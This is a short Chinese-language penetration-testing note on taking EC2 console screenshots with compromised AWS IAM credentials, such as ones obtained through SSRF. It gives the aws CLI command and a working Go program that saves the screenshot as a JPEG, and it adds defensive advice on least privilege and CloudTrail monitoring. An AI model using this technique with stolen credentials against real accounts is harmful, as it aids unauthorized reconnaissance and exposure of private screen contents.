在滲透測試中，桌面截圖是取得額外資訊、加深攻擊者對目標環境瞭解的重要手段。
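前提：需先取得 IAM 憑證（credential），例如透過 SSRF 等手段取得，且該憑證須具備 ec2:GetConsoleScreenshot 權限。防守方可依最小權限原則不授予此動作，並在 CloudTrail 中監控 GetConsoleScreenshot 事件。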
get-console-screenshot
> aws ec2 get-console-screenshot --instance-id {EC2_INSTANCE_ID} --output text
Output:
image bytes（以 base64 編碼的 JPG 影像資料，需先解碼才能檢視）
以下 Go 程式以 aws-sdk-go 呼叫同一個 API。前提相同：需先取得 IAM 憑證（credential），例如透過 SSRF 等手段取得。
package main
import (
"bytes"
"encoding/base64"
"fmt"
"image/jpeg"
"os"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/credentials"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/ec2"
)
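// main fetches a console screenshot of one EC2 instance through the
// GetConsoleScreenshot API and stores it locally as a JPEG file.
//
// The region, access keys and instance ID below are placeholders that must be
// filled in before the program can run. On any error the program prints a
// message and returns.
func main() {
	// Output path, shared by the file creation and the final message so the
	// two cannot disagree (the message used to say ".png" for a ".jpg" file).
	const outPath = "screenshot.jpg"

	// AWS Session
	// NOTE(review): the static keys are placeholders. Keys typed into source
	// end up in version control and in the built binary; leaving Credentials
	// unset makes the SDK use its default chain (environment, shared config).
	sess, err := session.NewSession(&aws.Config{
		Region:      aws.String("XXXXXXXX"),
		Credentials: credentials.NewStaticCredentials("XXX", "XXXXXXXXXX", ""),
	})
	if err != nil {
		fmt.Println("Error creating session:", err)
		return
	}

	// EC2 Service Client
	svc := ec2.New(sess)

	// EC2 instance ID
	instanceID := "X-XXXXXXXXXXXXX"

	// Get console screenshot
	input := &ec2.GetConsoleScreenshotInput{
		InstanceId: aws.String(instanceID),
	}
	result, err := svc.GetConsoleScreenshot(input)
	if err != nil {
		fmt.Println("Error getting console screenshot:", err)
		return
	}

	// ImageData is a pointer; guard it so a response without image data is
	// reported instead of causing a nil-pointer panic.
	if result == nil || result.ImageData == nil {
		fmt.Println("Error getting console screenshot: response contains no image data")
		return
	}

	// The image arrives base64-encoded; decode it to raw JPEG bytes.
	imgBytes, err := base64.StdEncoding.DecodeString(*result.ImageData)
	if err != nil {
		fmt.Println("Error decoding image data:", err)
		return
	}

	// Parse the bytes as JPEG so only a well-formed image is written out.
	img, err := jpeg.Decode(bytes.NewReader(imgBytes))
	if err != nil {
		fmt.Println("Error decoding image:", err)
		return
	}

	// A console screenshot shows whatever is on the instance's screen, so the
	// file is created owner-only (0600) instead of os.Create's 0666 default.
	// The mode only applies when the file does not exist yet.
	imgFile, err := os.OpenFile(outPath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
	if err != nil {
		fmt.Println("Error creating image file:", err)
		return
	}

	// Encode image to file; a failed write must not be reported as success.
	if err := jpeg.Encode(imgFile, img, nil); err != nil {
		imgFile.Close()
		fmt.Println("Error encoding image:", err)
		return
	}

	// Close explicitly: a write error can surface only at close time.
	if err := imgFile.Close(); err != nil {
		fmt.Println("Error closing image file:", err)
		return
	}

	fmt.Println("Screenshot saved as", outPath)
}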